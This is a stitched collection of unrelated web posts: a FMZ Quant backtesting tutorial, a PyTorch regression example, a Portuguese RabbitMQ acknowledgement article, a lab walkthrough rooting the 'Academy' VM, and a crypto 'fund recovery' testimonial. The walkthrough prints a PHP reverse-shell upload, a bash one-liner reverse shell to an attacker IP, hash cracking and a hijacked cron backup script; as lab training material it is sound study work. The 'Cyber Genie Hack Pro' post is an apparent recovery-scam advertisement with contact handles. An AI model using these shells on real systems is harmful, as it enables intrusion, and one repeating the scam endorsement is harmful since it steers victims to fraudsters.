Click on the "mylanguage core" trading library (because this strategy is written by M language, if you use other programming language, this option may not appear) First of all, set the trading label. The FMZ Quant M language have two types of backtest execution methods, which are: the closing price model and the latest price model. The closing price model refers to the execution of the model after the current K line is completed, and the trading is executed at the beginning of the next K line; The latest price model refers to the execution of a model for each price change, and when the trading signal is established, it will trade immediately. As shown below:


"The default open lot" size refers to the amount of opening and closing position when backtesting. "Max trade amount once" is the maximum opening position that is sent to the backtest engine by a single transaction.
There alway will be a deviation between the actual trading price and the planned trading price. This offset is generally moving in a direction that is not favorable to the trader, resulting in additional losses in the trading. Therefore, it is necessary to add slippage to simulate the real trading environment.
- Step 3
Fill in the "futures contract" with the type of contract you want to backtest, for cryptocurreny, we just need specify the period of k-line which we want to backtest, in this case, just use weekly k line, so, put "this_week" in.

"real-market settings" option is mainly used for real-market trading, in the backtesting environment, we just maintain it default setting will be fine. If the "automatic recovery progress" is marked true, then when the robot stops in the real market, restarting the robot will automatically restore the previous signal position without recalculating the signal. "the number of order retries" set to 20 by default. When placing order fails, it will try to re-sending until 20 times. "Network polling interval (milliseconds)" is where the robot executes the strategy code every another time.

- Step 4
Spot trading option is primarily for cryptocurrency trading, when backtesting, keep it in the default settings will be fine. If you want, you can specify all the parameters in these settings. In addition, for some cryptocurrency exchanges, you can also set leverage sizes and other related settings.

## Strategy Backtest
Before backtesting, determine your trading strategy. Here we take the "Thermostat" timing strategy as an example. This strategy will adopt a trend strategy in the trend market according to the market state, and adopt a Oscillating strategy in the volatile market. The source code is as shown below (can also be downloaded from the FMZ Quant Website's Strategy Square page):
```
// Calculate CMI indicator to distinguish between Oscillating and trend market
CMI:=ABS(C-REF(C,29))/(HHV(H,30)-LLV(L,30))*100;
// Define key prices
KOD:=(H+L+C)/3;
// In the Oscillating market, the closing price is greater than the key price is suitable for selling market, otherwise it is for buying market
BE:=IFELSE(C>KOD,1,0);
SE:=IFELSE(C<=KOD,1,0);
// Define 10-day ATR indicator
TR:=MAX(MAX((HIGH-LOW),ABS(REF(CLOSE,1)-HIGH)),ABS(REF(CLOSE,1)-LOW));
ATR10:=MA(TR,10);
// Define the highest and lowest price 3-day moving average
AVG3HI:=MA(H,3);
AVG3LO:=MA(L,3);
// Calculate the entry price of the Oscillating market
LEP:=IFELSE(C>KOD,O+ATR10*0.5,O+ATR10*0.75);
SEP:=IFELSE(C>KOD,O-ATR10*0.75,O-ATR10*0.5);
LEP1:=MAX(LEP,AVG3LO);
SEP1:=MIN(SEP,AVG3HI);
// Calculate the entry price of the trend market
UPBAND:=MA(C,50)+STD(C,50)*2;
DNBAND:=MA(C,50)-STD(C,50)*2;
// Calculate the quit price of the trend market
MA50:=MA(C,50);
// Oscillating strategy logic
CMI<20&&C>=LEP1,BK;
CMI<20&&C<=SEP1,SK;
CMI<20&&C>=AVG3HI,SP;
CMI<20&&C<=AVG3LO,BP;
// Trend strategy logic
CMI>=20&&C>=UPBAND,BK;
CMI>=20&&C<=DNBAND,SK;
CMI>=20&&C<=MA50,SP;
CMI>=20&&C>=MA50,BP;
AUTOFILTER;
```
In the simulation backtesting interface, after configuring the backtesting settings, click on the Start Backtest button, and the backtesting results will be displayed immediately after few seconds. In the backtest log, it will show how many seconds used for backtest, logs, and the total number of transaction. The account information prints the final results of the strategy backtest: average profit and loss, position profit and loss, margin, commission fees and estimated returns.

Status bar records the trading variety, positions, positions prices, the latest price, the previous trading signal types, the highest and lowest price of positions, the number of updates as well as capital and time information. In addition, in the floating profits and losses label, the detailed fund curve of the account is displayed, and the commonly used performance indicators are also included: the rate of return, the annualized rate of return, the Sharpe ratio, the annualized volatility, and the maximum retracement rate, which can basically satisfy the vast majority of users needs.
Among them, the most important performance indicator is: Sharpe ratio. It was while implementing comprehensive index consider the benefits and risks, and it is an important index to measure a fund products. In general, it is how much risk you bear, every time when you earn profit, so the Sharpe ratio value is higher, the better.
The annualized volatility, put simply, annualizing a figure assumes observations over a short time frame will continue over the course of a year. It is a measure of the risk of the fund, but it is definitely not the full risk. For example, Strategy A has a larger volatility, but it has been volatility upwards, the profit is good; Strategy B has a small volatility, but it has been steadily moving(barely not move at all). Can we say that Strategy B is better than Strategy A ? Strategy A as shown below :

Finally, in the log information, a detailed record of each trading brokered situation when backtesting, including the specific time of the trading, the exchange information, the open and close position type, backtest engine match orders mechanism, as well as the number of transactions and print out informations.

## After Backtesting
Many times, and in most cases, the results of backtesting will be far from what you expect. After all, a long-term, stable and profitable strategy is not so easy to get, which requires your ability to understand the market.
If your strategy backtest results are losing money, don't be discouraged. This is actually quite normal. check wether the strategy logic is been misinterpreted by the code, wether it is using some extreme parameters, is it using too much opening position conditions, etc. It is also necessary to re-examine the trading strategies and trading ideas from another angle.
If your strategy backtest results are very good, the funding curve is perfect, with a Sharpe ratio of higher than 1. Please don't be in a hurry, In this case, most of situations are using the future functions, stealing prices, over-fitting, or no slippage price added, etc. You can use the off-sample data and the simulation real-market trading to exclude these issues.
## To sum up
The above is the entire process of the trading strategy backtesting, it can be said that it has been specific to every detail. It should be noted that historical data backtesting is an ideal environment where all risks are known. Therefore, it is best to go through a round of bull and bear market for the backtesting time of the strategy. The effective number of tradings should be no less than 100 times, so as to avoid some survivors' biases.
The market is always in the process of change and evolution. The historical backtesting strategy does not mean that the future will be the same. It is not only to let the strategy cope with the known possible risks in the backtesting environment, but also to deal with the unknown risks in the future. Therefore, it is very necessary to increase the risk resistance and universality of the strategy.
## After-school exercises
1. Try to copy the strategy in this section and backtest it.
2. Try to improve and optimize the strategy in this section based on your trading experience.
From: https://blog.mathquant.com/2019/05/08/5-2-how-to-do-quantitative-trading-backtesting.html | fmzquant |
1,878,609 | Linear Regression Neural Network with nn.Linear() in PyTorch | import torch from torch import nn import matplotlib.pyplot as plt # Setup device device = "cuda" if... | 0 | 2024-06-06T01:20:11 | https://dev.to/hyperkai/linear-regression-neural-network-with-nnlinear-in-pytorch-h4k | pytorch, linearregression, neuralnetwork, deeplearning | ```python
import torch
from torch import nn
import matplotlib.pyplot as plt
# Setup device
device = "cuda" if torch.cuda.is_available() else "cpu"
# print(device)
# Create data
weight = 0.7
bias = 0.3
X = torch.arange(start=0, end=1, step=0.02, device=device).unsqueeze(dim=1)
y = weight * X + bias
# print(X[:10], len(X))
# print(y[:10], len(y))
l = int(0.8 * len(X))
X_train, y_train, X_test, y_test = X[:l], y[:l], X[l:], y[l:]
# print(len(X_train), len(y_train), len(X_test), len(y_test))
class MyModel(nn.Module):
def __init__(self):
super().__init__()
self.linear_layer = nn.Linear(in_features=1, out_features=1)
def forward(self, x):
return self.linear_layer(x)
torch.manual_seed(42)
my_model = MyModel().to(device)
# print(my_model, my_model.state_dict())
# print(next(my_model.parameters()).device)
# print(next(my_model.parameters()))
loss_fn = nn.L1Loss()
# loss_fn = nn.MSELoss()
optimizer = torch.optim.SGD(params=my_model.parameters(), lr=0.01)
# optimizer = torch.optim.Adam(params=my_model.parameters(), lr=0.01)
epochs = 100 # Try 0, 50, 100, 150
epoch_count = []
loss_values = []
test_loss_values = []
for epoch in range(epochs):
my_model.train()
# 1. Calculate predictions
y_pred = my_model(X_train)
# 2. Calculate loss
loss = loss_fn(y_pred, y_train)
# 3. Zero out gradient
optimizer.zero_grad()
# 4. Do backpropagation
loss.backward()
# 5. Optimize model
optimizer.step()
# Test
my_model.eval()
with torch.inference_mode():
test_pred = my_model(X_test)
test_loss = loss_fn(test_pred, y_test)
if epoch % 10 == 0:
epoch_count.append(epoch)
loss_values.append(loss)
test_loss_values.append(test_loss)
# print(f"Epoch: {epoch} | Loss: {loss} | Test loss: {test_loss}")
# Visualize
with torch.inference_mode():
y_pred = my_model(X_test)
def plot_predictions(X_train, y_train, X_test, y_test, predictions=None):
plt.figure(figsize=[6, 4])
plt.scatter(X_train, y_train, c='g', s=1, label='Train data')
plt.scatter(X_test, y_test, c='b', s=3, label='Test data')
if predictions is not None:
plt.scatter(X_test, predictions, c='r', s=5, label='Predictions')
plt.title("Train and test data and predictions")
plt.legend(prop={'size': 14})
plot_predictions(X_train=X_train.cpu(),
y_train=y_train.cpu(),
X_test=X_test.cpu(),
y_test=y_test.cpu(),
predictions=y_pred.cpu())
def plot_loss_curves(epoch_count, loss_values, test_loss_values):
plt.figure(figsize=[6, 4])
plt.plot(epoch_count, loss_values, label="Train loss")
plt.plot(epoch_count, test_loss_values, label="Test loss")
plt.title("Train and test loss curves")
plt.ylabel("Loss")
plt.xlabel("Epochs")
plt.legend(prop={'size': 14})
plot_loss_curves(epoch_count=epoch_count,
loss_values=torch.tensor(loss_values).cpu(),
test_loss_values=torch.tensor(test_loss_values).cpu())
```
# <`L1Loss()` and `SGD()`>
### `epochs = 0`:

### `epochs = 50`:

### `epochs = 100`:

### `epochs = 150`:

# <`MSELoss()` and `SGD()`>
### `epochs = 0`:

### `epochs = 50`:

### `epochs = 100`:

### `epochs = 150`:

# <`L1Loss()` and `Adam()`>
### `epochs = 0`:

### `epochs = 50`:

### `epochs = 100`:

### `epochs = 150`:

# <`MSELoss()` and `Adam()`>
### `epochs = 0`:

### `epochs = 50`:

### `epochs = 100`:

### `epochs = 150`:
 | hyperkai |
1,878,601 | Como utilizar o Ack do RabbitMQ de forma eficiente | A Motivação por Trás Deste Artigo Recentemente, participei de um debate no ambiente de... | 0 | 2024-06-06T01:20:02 | https://dev.to/mrdiniz88/como-utilizar-o-ack-do-rabbitmq-de-forma-eficiente-3i2m | rabbitmq, microservices, go, backend | ## A Motivação por Trás Deste Artigo
Recentemente, participei de um debate no ambiente de trabalho sobre como lidar com o reconhecimento da leitura de mensagens no RabbitMQ.
Alguns colegas argumentaram que baseados em experiências anteriores a melhor abordagem para essa aplicação seria usar o auto-ack. Eles relataram que, ao utilizar o ack manual, um erro inesperado ocorreu durante o processamento da mensagem, resultando na sua volta para a fila e em seu reprocessamento várias vezes.
Inspirado por essa discussão e por este [post](https://share.gago.io/Mvzh) do blog de [Luiz Carlos Faria](https://www.linkedin.com/in/luizcarlosfaria), decidi escrever sobre por que provavelmente esse comportamento ocorreu e qual, na minha visão, seria a melhor maneira de lidar com o reconhecimento de leitura dessas mensagens e o tratamento adequado em caso de erros.
## Para chegar ao assunto principal, preciso explicar o que é, e o que o RabbitMQ nos oferece
O RabbitMQ é um poderoso message broker que facilita a comunicação entre diferentes partes de um software. O RabbitMQ oferece diversos recursos para lidar com a publicação e o recebimento de mensagens. Os principais recursos abordados neste artigo são:
- Queues
- Exchanges
- Acknowledgement
- Dead Letter Exchange
### Queues:
A principal função de uma fila é evitar a execução imediata de uma tarefa que consome muitos recursos e evitar a necessidade de esperar que ela seja concluída.
No modelo de mensagens do RabbitMQ, o produtor (producer) nunca envia uma mensagem diretamente para uma fila.
Para uma mensagem chegar a uma fila no RabbitMQ, ela precisa passar por um recurso chamado Exchange. Mesmo ao enviar uma mensagem para uma fila sem definir uma exchange, como mostrado no exemplo abaixo, a mensagem passará por uma exchange conhecida como _default exchange_.
```go
package main
func main() {
conn, _ := amqp.Dial("amqp://guest:guest@localhost:5672/")
defer conn.Close()
ch, _ := conn.Channel()
defer ch.Close()
queue, _ := ch.QueueDeclare(
"TransactionCompleted",
true,
false,
false,
false,
nil,
)
message := message{
ID: "1",
}
payload, _ := json.Marshal(message)
ch.Publish(
"",
queue.Name,
false,
false,
amqp.Publishing{
ContentType: "text/plain",
Body: []byte(payload),
},
)
}
```
### Exchanges:
As exchanges são um recurso que tem como propósito gerenciar e direcionar as mensagens publicadas no RabbitMQ.
Existem alguns tipos de exchanges disponíveis: direct, topic, headers e fanout. Caso queira saber mais, este [artigo](https://www.cloudamqp.com/blog/part4-rabbitmq-for-beginners-exchanges-routing-keys-bindings.html) pode ajudar.
#### declare
```go
ch.ExchangeDeclare(
"Transaction",
"topic",
true,
false,
false,
false,
nil,
)
queue, _ := ch.QueueDeclare(
"ProcessTransaction",
true,
false,
false,
false,
nil,
)
eventName := "out.requested"
ch.QueueBind(
queue.Name, // name
eventName, // key
"Transaction", // exchange
false, // noWait
nil, // args
)
```
#### publish
```go
func (r *RabbitMQAdapter) Publish(eventName string, data any) error {
payload, err := json.Marshal(data)
if err != nil {
return err
}
return r.channel.Publish(
r.exchange, // exchange
eventName, // key
false, // mandatory
false, // immediate
amqp.Publishing{
ContentType: "text/plain",
Body: []byte(payload),
}, // msg
)
}
func main() {
// ...
rabbitmq := RabbitMQAdapter{
connection: conn,
channel: ch,
}
message := message{
ID: "1",
}
rabbitmq.Publish(eventName, message)
}
```
#### consume
```go
func (r *RabbitMQAdapter) Consume(queueName string, callback func(data any) error) error {
msgCh, _ := r.channel.Consume(
queueName,
"", // consumer
true, // auto-ack
false, // exclusive
false, // no-local
false, // no-wait
nil, // args
)
for msg := range msgCh {
callback(msg.Body)
}
return nil
}
func main() {
// ...
rabbitmq.Consume("ProcessTransaction", func(data any) error {
// process transaction ...
return nil
})
}
```
### Acknowledgement:
Quando o RabbitMQ entrega uma mensagem a um consumidor, ele precisa saber quando considerar que a mensagem foi enviada com sucesso. O RabbitMQ nos oferece duas formas de lidar com isso: auto-ack e ack manual.
No auto-ack, o RabbitMQ descarta a mensagem assim que ela é consumida.
No ack manual, temos o controle de quando emitir essa confirmação e se ela é positiva ou negativa.
#### exemplo de ack manual
```go
func (r *RabbitMQAdapter) Consume(queueName string, callback func(data any) error) error {
msgCh, _ := r.channel.Consume(
queueName,
"", // consumer
false, // auto-ack
false, // exclusive
false, // no-local
false, // no-wait
nil, // args
)
for msg := range msgCh {
if err := callback(msg.Body); err != nil {
msg.Nack(
false, // multiple
true, // requeue
)
} else {
msg.Ack(
false, // multiple
)
}
}
return nil
}
```
### Dead Letter Exchange:
As mensagens de uma fila podem ser "dead-lettered", o que significa que essas mensagens são republicadas em uma exchange quando qualquer um dos quatro eventos a seguir ocorrer:
- A mensagem é reconhecida negativamente por um consumidor usando basic.reject ou basic.nack com requeue definido como false.
- A mensagem expira devido ao TTL (tempo de vida) por mensagem.
- A mensagem é descartada porque sua fila excedeu um limite de comprimento.
- A mensagem é retornada mais vezes para uma fila quorum do que o limite de entrega.
## Como evitar o reprocessamento de mensagens
Agora que entendemos os recursos oferecidos pelo RabbitMQ, vamos analisar o possível motivo do comportamento mencionado no debate e como isso poderia ter sido evitado.
É muito provável que a opção de requeue ao chamar o método nack ou reject estivesse ativa.
```go
msg.Nack(
false, // multiple
true, // requeue
)
// ou...
msg.Reject(
true, // requeue
)
```
Tendo isso em vista, para evitar o reprocessamento da mensagem, poderíamos simplesmente colocar a flag de requeue da mensagem como false.
```go
msg.Nack(
false, // multiple
false, // requeue
)
// ou...
msg.Reject(
false, // requeue
)
```
Dessa forma, a mensagem não voltaria para a fila e seria descartada, assim como acontece no auto-ack.
## Como utilizar o ack manual de forma eficiente
Por padrão, ao utilizar _Nack_ ou _Reject_, a mensagem é perdida, porém, nem sempre é o que queremos. Para esse caso, o RabbitMQ nos oferece a Dead Letter Exchange. Tendo esse recurso ativo em uma fila, ao rejeitarmos uma mensagem, ela é encaminhada para essa exchange, que por sua vez direciona a mensagem para os interessados.
```go
dlxName := "ProcessingError"
ch.ExchangeDeclare(
dlxName, // name
"fanout", // kind
true, // durable
false, // autoDelete
false, // internal
false, // noWait
nil, // args
)
dlq, _ := ch.QueueDeclare(
"NotifyCustomer",
true,
false,
false,
false,
nil,
)
ch.QueueBind(dlq.Name, "", dlxName, false, nil)
queue, _ := ch.QueueDeclare(
"ProcessTransaction",
true,
false,
false,
false,
amqp.Table{
"x-dead-letter-exchange": dlxName,
},
)
```
## Conclusão
Com os recursos apresentados acima, o problema inicialmente discutido neste artigo, que é o reprocessamento indevido das mensagens, pode ser solucionado.
O ack manual com a opção _requeue_ desativada, juntamente com a _Dead Letter Exchange_, formam uma poderosa combinação para lidar com erros na sua aplicação. | mrdiniz88 |
1,878,600 | RECLAIM BITCOIN/DIGITAL ASSET...RECOVER MONEY BACK... | Imagine the sheer disbelief and joy one would feel upon discovering that a staggering $394,000 worth... | 0 | 2024-06-06T01:15:27 | https://dev.to/keith_snyder_9200fd1cd266/reclaim-bitcoindigital-assetrecover-money-back-2mb0 | webdev, programming, python | Imagine the sheer disbelief and joy one would feel upon discovering that a staggering $394,000 worth of Bitcoin, seemingly vanished into the ether, has reappeared. This is precisely the remarkable scenario that unfolded for me, I found my missing cryptocurrency fortune thanks to the intervention of a digital wizard of sorts, Cyber Genie Hack Pro. In the ever-evolving landscape of blockchain technology and decentralized finance, the loss or theft of digital assets is an all-too-common occurrence, leaving victims grappling with the agonizing prospect of never recovering their hard-earned funds. However, in my case, I refused to accept defeat, and through a combination of persistence, technological savvy, and a stroke of good fortune, they were able to track down and reclaim my missing Bitcoin. The process, no doubt, was arduous and fraught with uncertainty, but the payoff was nothing short of life-changing. Imagine the relief, vindication, and the renewed faith in the system that must have washed over me as I watched my lost treasure reappear, like a rabbit pulled from the magician's hat. This remarkable tale serves as a testament to the resilience of the human spirit, the power of innovative solutions, and the potential for technology to overcome even the most daunting challenges. It is a story that reminds us that in the ever-evolving world of digital assets, the impossible may not be as out of reach as we might think through the aid of Cyber Genie Hack Pro. Talk to a representative of theirs via:
W.E.B/ w.w.w (cybergeniehackpro) . x y z
T.E.L.E.G.R.A.M/ (@)Cybergeniehackpro
W.H.A.T.S.A.P.P LINK/ wa.link/aciuds
Thank you.
 | keith_snyder_9200fd1cd266 |
1,878,483 | What would I say to my past self 2 years ago? | Easy Answer: Buy Crypto. Thank you all, see you next time! Just kidding (or not), but... | 0 | 2024-06-06T01:15:16 | https://dev.to/mateussousa00/what-would-i-say-to-my-past-self-2-years-ago-fm0 | webdev, beginners, productivity, learning | ## Easy Answer:
Buy Crypto.
Thank you all, see you next time!
Just kidding (or not), but let me introduce myself... I'm a Fullstack Developer, I work mainly with JS/TS, but I've ventured into PHP, Java, Kotlin, and Go... all within two years.
I've learned a lot during this time, but the funny thing is, the most valuable lessons I learned were more related to soft skills, communication, and people management. Weird, right?
So, you probably came here imagining that I would share some knowledge about what to learn first, roadmaps, or how to get the first job. These things are valuable, but they are easy to find. That's why I want to introduce you to the first topic of this discussion:
## Learn How to Search
As a beginner, you will probably struggle a lot when searching for things on the internet to help you with the tasks you are facing right now.
You might be wondering, "But this is easy, I just need to use ChatGPT, and my problem is solved." You're partially correct, but if you don't know how to search effectively, you will probably be in trouble soon.
I don't want to be a moralist and say that you shouldn't use it, but if you do, use it correctly. Understand the question, the task, and the logic you need to overcome the situation. Be a good searcher; every good developer is.
Because if you ask the AI for the solution to your problem, it may provide one, but would it be the best solution? Would it be a solution that doesn't put your project at risk of security or performance issues?
Think about it.
This advice isn't valuable only for developers. For example, if you want a job, don't just Google "remote job"; this is too vague. Always focus on your needs. For me, as a Fullstack developer who knows many languages, I'd do searches like:
> "Fullstack developer with Spring Kotlin and Vue.js remote"
> "Backend developer with NestJS and GraphQL remote"
I could do lots of variations of this, but this is way better than "remote job."
## Appear, Lose Your Shyness
Here in Brazil, we have a popular quote that is:
> Quem não é visto, não é lembrado
This means if they don't see you, they will never remember you. Hard, isn't it?
The thing is, you could be one of the best developers in the world, but if no one knows who you are, honestly? It's not valuable.
Talk to other developers, recruiters, POs, PMs. You don't have to be straightforward with "Do you have a job?" Share things that could add value to their lives, like a post you read on LinkedIn or dev.to (from me, of course), or a video about a new trend in IT.
I remember when a friend of mine introduced me to BUN. We discussed it, and it was a nice conversation. I really appreciated it.
Also, remember always: be nice, be gentle.
Create meaningful connections that you desire to bring into your life. New job positions, companies, and networks will always appear (as long as people remember you).
## Learn Wisely
This is tricky, right? Let me be straightforward: what do you want to be? A developer? A PO? Understand the role you want. If you don't know yet, it's time to learn what these roles do in a company or a job.
When you discover what you want to be, create a roadmap based on what makes a good developer, a good Product Owner... Remember that thing I told you earlier? Learn how to search.
This is probably the most valuable advice you'll have today, again: Learn how to search.
For example, if you want to be a good developer, you don't have to learn too many languages at once. Master one first, then discover other languages.
## TL;DR
- Buy crypto (not even kidding);
- Learn how to search and use AI as your copilot;
- Appear, lose shyness, make yourself visible in a good way;
- Learn wisely; a good learner knows which steps to take;
I think this is a good start for a post, right? I'll probably write more focused on one or two topics mentioned here, but that's it for today.
See you soon! | mateussousa00 |
1,867,148 | EXPLOITING ACADEMY MACHINE WITH PRIVILEDGE ESCALATION | In this walkthrough, we'll explore privilege escalation techniques in a controlled environment. We'll... | 0 | 2024-06-06T01:11:02 | https://dev.to/babsarena/exploiting-academy-machine-with-priviledge-escalation-4ghe | In this walkthrough, we'll explore privilege escalation techniques in a controlled environment. We'll simulate a scenario where we have low-level access to a system and attempt to gain higher privileges. This process will be conducted ethically on a dedicated training machine to understand attacker methodologies and bolster our system defence knowledge.
After successfully setting up your academy machine, use the following details to login to the machine.
**Username: root**
**Password: tcm**

Now we need to get the IP address of the academy machine, to get that input the command:
```
dhclient
```
after that input the command:
```
ip a
```

From the above image, my IP address for academy is **192.168.59.134**
Now we can ping the machine to confirm that both our academy and kali machine are alive and communicating.
For that we use the command:
```
ping 192.168.59.134 -c2
```
NB- your IP address would be different from mine so make sure to note your IP address and ping it.

The image above shows both machines can communicate as no packets were lost.
Next we run NMAP scan to search for open ports using the command:
```
nmap -p- -A 192.168.59.134
```

From the above scan, 3 ports are open, port 21, 22 and 80.
Also note that I indicated note.txt seen on port 21, that's because I am interested in getting the txt file since it was shown to us from our scan.
**NB- Moving forward, create an academy directory so you can store all files needed for this lab, so as not to have all files scattered around.**

Port 21 is being used by an ftp server which allows anonymous login, so to login, we input the command:
```
ftp 192.168.59.134
```
NB- remember to change the IP address
After entering the command, input **anonymous** for both username and password.
Once you have successfully logged in, input the command below to get the note.txt file.
```
get note.txt
```

That's all you need to do to get the file, the next thing to do now is to exit ftp and view the txt file, to exit ftp use the command:
```
exit
```
Once you have successfully exited ftp, now we need to view what is inside the **note.txt** file and for that we use the command:
```
cat note.txt
```

The file shows a message from **jdelta**, telling **Heath** about **Grimme** which contains a text about a student's record.
Here's what each data point likely represents:
StudentRegno: 10201321 (Likely a unique student identification number)
studentPhoto: '' (Empty, indicating no photo uploaded)
password: 'cd73502828457d15655bbd7a63fb0bc8' (This is a hashed password, not the original password for security reasons)
studentName: 'Rum Ham' (Student's name)
pincode: '777777' (Possibly a student identification code)
session: '' (Empty, might be session year or term)
department: '' (Empty)
semester: '' (Empty)
cgpa: '7.60' (Student's CGPA - likely Cumulative Grade Point Average)
creationdate: '2021-05-29 14:36:56' (Date and time the record was created)
updationDate: '' (Empty, might be filled when the record is updated)
Now that we have a likely username and password to login into a website which we currently have no idea what the website is.
The first thing we do is input the machine's IP address into a web browser.
Mine still remains **192.168.59.134**, so that is what I input into my web browser.

That's the page it led me to and there's no space for login details, so there must be a login page attached to that IP address.
To find that we can use what is known as **dirb-buster or ffuf**
For this lab I'd make use of FFUF using the command:
```
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.59.134/FUZZ
```
The above command will search for web directories associated with that IP address.

It found two web directories which are **academy** and **phpmyadmin**
Now, we go to our web-browser and input:
```
192.168.59.134/academy
```
NB- remember to change the IP address to yours

I have successfully found the login page and from the note.txt file I was given the details to use for the login which are:
**StudentRegno: 10201321
password: cd73502828457d15655bbd7a63fb0bc8**

The details shows invalid because the password given is not an actual password, it was actually the password hash, which means we need to crack the hash to find out what the actual password is.
To crack the hash, we need to create a file and save the password hash into the file.
To create the password file we'd use **nano** , so input the command:
```
nano hashes.txt
```
Paste the hash in the terminal

Now press **ctrl x** on your keyboard to save

Now press **Y** on your keyboard to save
The below command will change like the image seen below, press the **enter** key on your keyboard to save the file.

Now the hash as been saved as a file named hashes.txt.
To crack the hash we first need to identify what type of hash it is, and we do that using the command:
```
hash-identifier
```
and now we paste the hash

From the image above the hash is said to be an md5 hash.
knowing that we press **ctrl c** to quit the hash-identifier and input the command:
```
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
```
It will reveal the real password to us.
If you have cracked the password before and couldn't see the password, input the command:
```
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt --show
```

The password would reveal itself.
We can also use another method to crack the hash if we do not want to use hashcat.
To crack the hash, visit "https://crackstation.net/" on your web browser and input the hash in the box provided and click on crack hashes.

The hashed password was revealed to be **student**.
Now we can login with the details:
**StudentRegno: 10201321
password: student**

**Login successful!**
NB- There's no need to change the password, just click on **"my profile"** on the web page.

We can see from the web-browser that the website is making use of PHP programming language.
We can also see that there's a place to upload image which is empty, the plan now is to see if we can upload something other than an image in there.
What we plan on uploading is a script which is a reverse shell so as to give us a connection here.
From here, go to google and search for **"php reverse shell"**

Click on the one from pentestmonkey github

Click on php-reverse-shell.php

Click on **Raw**
Now copy everything by pressing the **ctrl A** and **ctrl C** on your keyboard and save it as a file named **shell.php**.
To save the file, input the command:
```
nano shell.php
```
Now paste all that you have copied.
NB- Scroll down and find where you can see **CHANGE THIS**

Change the IP address to your attacking machine's IP address (not the academy IP address)
You can leave the port number as it is as 1234.
Once that has been changed, save the file.
Now input the command:
```
nc -nvlp 1234
```
once you've inputted that command, what you need to do is upload the shell.php file where the upload image is and click on update, to make sure the changes has saved.
No image will be displayed but you would have gotten a shell on your listener.

The image above shows the listener before the image upload

The image above shows the listener after the image upload.
We have successfully popped a shell.
To find out who we are on the machine, we input the command:
```
whoami
```

We are a low level user known as **www-data**, so our job here is not done because we do not have super user privilege, so we need to find a way to escalate the user to a super user like an admin or root.
To do that we are going to use a tool called "linpeas"
Linpeas is an automation tool that helps us in searching for any sort of privilege escalation.
To use linpeas visit the website "https://linpeas.sh/"

Now we need to copy everything seen on the linpeas page and save it in a file.
To do that we use **"ctrl A"** to mark all and **"ctrl C"** to copy.
Then we need to **open a new tab** on our **kali** and use **nano** to paste what we copied and save it.
To save my linpeas file I created a new directory called "transfer" and saved the linpeas there.
NB- you can choose to create a new directory if you wish, or just save the file in your current directory.
To save the linpeas file we copied from the webpage, we input the command:
```
nano linpeas.sh
```
and then we paste the copied text and save the file.

The file has been saved on our local device, so now we need to find a way to send the linpeas.sh file into the remote shell we accessed in which we are the www-data user.
To do that we need to host a web-server in the directory where the linpeas file was saved and use wget to get the file.
So on the tab where the linpeas file is saved, input the command:
```
python3 -m http.server 80
```

Now move back to the www-data user tab and cd into the tmp folder using the command:
```
cd tmp
```
so as to have the file saved in the tmp folder, now we input the command below to get the linpeas file:
```
wget http://192.168.59.131/linpeas.sh
```

Now we need to make the file executable and we do that by using the command:
```
chmod +x linpeas.sh
```

and now we run the linpeas file using the command:
```
./linpeas.sh
```
There are lots of things to scroll through after running the above command, but for us what stands out and calls for our attention is a file that it shows us and also a password as shown in the image below

From the image above we can spot this:
```
/var/www/html/academy/admin/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";
/var/www/html/academy/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";
```
The /var/www/html/academy/includes/ is a directory and config.php is a file, so to check the content of the file we input the command:
```
cat /var/www/html/academy/includes/config.php
```
and we get the following response as shown in the image below:

The image above is showing us that there's a sql user named **grimmie** with a password of **My_V3ryS3cur3_P4ss**
So now we open a new tab and try login into the machine as grimmie using ssh with the command:
```
ssh grimmie@192.168.59.134
```
If it asks you about a fingerprint input the command **yes**
For the password input:
```
My_V3ryS3cur3_P4ss
```

we have successfully logged in as grimmie.
According to the command ```cat /etc/passwd ``` grimmie is an administrator on the machine.

Grimmie is an administrator but yet we still do not have sudo(super user) privilege after inputting the command:
```
sudo -l
```

So our work here isn't done.
After inputting the command
```
ls
```
and
```
cat backup.sh
```

What we can see is that there's a script running periodic backup and after seeing that we would like to know the time it takes for the backup to occur because we plan on editing the script to run a particular command for us, so we need to know if the backup is running per hour, per day, per week or whatever time it takes to run.
First we input the command:
```
crontab -l
```

From the results gotten, grimmie does not have access to crontab, if grimmie had access to crontab we would have been able to edit how frequently the backup should be taking place, because we plan on running a script as soon as possible and would not like to wait till a particular day or week before the script can be executed.
Also we can use the command:
```
systemctl list-timers
```
to see if there's any script running on a timer but from the output gotten we cannot find any.

When we have a situation like this we can use a tool called **pspy**.
Pspy is a tool that would give us more information about what processes are running than what our devices has been showing us so far.
To download pspy, we search google for pspy and select the one seen from the image below.

Scroll down and download the 64 bit pspy

The pspy64 should be located in your download folder on kali, locate your download folder and find the pspy64 and host a webserver in the directory that contains the pspy64 and use wget on grimmie's tab to get the pspy64.
After locating the directory that contains the pspy64 (which should be your downloads folder), input the command in that directory:
```
python3 -m http.server 80
```

and on grimmie's tab, you can move into the tmp folder using the command ```cd /tmp``` so as to store the file in the tmp folder and input the command:
```
wget http://192.168.59.131/pspy64
```
Now that the pspy64 file has been downloaded, we need to make it executable by using the command:
```
chmod +x pspy64
```

Now we execute the file using the command:
```
./pspy64
```
After a while we can see that the backup.sh file is actually running in the background

The backup is actually programmed to run every minute, which is good news for us, now we can move on to editing the backup script.

The image above is a confirmation of the time it takes for the backup script to run.
Now we need to go back to our directory that has the backup file.
To do that we input the command:
```
cd /home/grimmie
```
Now we go to google and search for **bash reverse shell one liner**
Select the one from pentestmonkey as shown below

The image below shows the bash we need, it is a one line reverse shell script.

Now copy the script which is:
```
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
```
and change the 10.0.0.1 to your attacker/local machine, remember mine is 192.168.59.131, so mine would look like this:
```
bash -i >& /dev/tcp/192.168.59.131/8080 0>&1
```
First we need to set up a listener and to set that up, we open a new tab and use the command:
```
nc -nvlp 8080
```
After setting up the listener we need to edit the backup.sh script to our bash one liner script.
To do that we go back to our grimmie tab and input the command:
``nano backup.sh
```
Clear the backup script and input the one liner script just as shown in the image below.

and save the file.

Within a minute a root shell was gotten while while waiting for the file to execute.

Congratulations!
We have successfully rooted the machine.
| babsarena | |
